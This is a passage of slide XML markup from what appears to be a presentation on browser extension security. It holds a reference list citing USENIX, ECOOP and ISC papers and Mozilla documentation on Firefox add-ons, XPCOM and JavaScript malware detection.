                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Proceedings</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-55" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>of</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>19th</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>USENIX  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>conference </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Security, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ser. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>USENIX Security’10. USENIX </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Association, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2010, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>pp.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-85" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>23–23.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="2112645" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="290"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="286385" algn="l"/>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>MOZILLA </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>DEVELOPER </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>NETWORK, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“XPCOM </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Interface Reference by </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>grouping,”  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>https://developer.mozilla.org/en/XPCOM Interface Reference group, December</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2010.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="2262505" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="285"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="286385" algn="l"/>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Mozilla </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Firefox, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“Best of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2 </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>billion </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>firefox </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>add‐ons,” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>https://addons.mozilla.org/en‐  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>US/firefox/collections/mozilla/bestof2billion/?src=rockyourfirefox, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>December</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-60" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2012</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="5080" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="290"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="286385" algn="l"/>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>C. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Curtsinger, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>B. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Livshits, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>B. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Zorn, and C. Seifert, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“Zozzle: </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>fast </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and precise </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in‐browser </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>javascript </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>malware </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>detection,” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Proceedings of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the 20th USENIX </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>conference </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>on </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Security, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ser. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>SEC’11. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>USENIX </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Association, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2011, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>pp.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-165" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>3–3.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="332740" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="285"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="286385" algn="l"/>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>R. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Karim, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>M. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Dhawan, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-70" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>V. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Ganapathy, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>and C.‐c. Shan, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-40" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“An </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>analysis of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>mozilla </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>jetpack extension </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>framework,” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Proceedings of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the 26th </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>European </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>conference </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>on</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-160" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Object‐</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="290"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="286385" algn="l"/>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Oriented </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Programming, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ser. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ECOOP’12. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Springer‐Verlag, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>2012, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>pp.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="75" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>333–355.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" marR="90805" indent="-274320">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="290"/>
              </a:spcBef>
              <a:buClr>
                <a:srgbClr val="0BD0D9"/>
              </a:buClr>
              <a:buSzPct val="91666"/>
              <a:buAutoNum type="arabicPeriod"/>
              <a:tabLst>
                <a:tab pos="286385" algn="l"/>
                <a:tab pos="287020" algn="l"/>
              </a:tabLst>
            </a:pPr>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>J. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Wang, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>X. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Li, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>X. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Liu, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>X. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Dong, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>J. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-25" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Wang, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Z. Liang, and Z. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Feng, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-40" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>“An </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>empirical </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>study of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>dangerous </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>behaviors </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>firefox  </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-20" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>extensions,” </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>in </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Proceedings of </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>the </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-10" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>15th international </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>conference </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>on Information </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Security, </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-30" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ser. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>ISC’12. </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-15" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>Springer‐Verlag,  pp.</a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t> </a:t>
            </a:r>
            <a:r>
              <a:rPr sz="1200" spc="-5" dirty="0">
                <a:latin typeface="Constantia"/>
                <a:cs typeface="Constantia"/>
              </a:rPr>
              <a:t>188–203.</a:t>
            </a:r>
            <a:endParaRPr sz="1200">
              <a:latin typeface="Constantia"/>
              <a:cs typeface="Constantia"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:pPr marL="287020" indent="-274320">
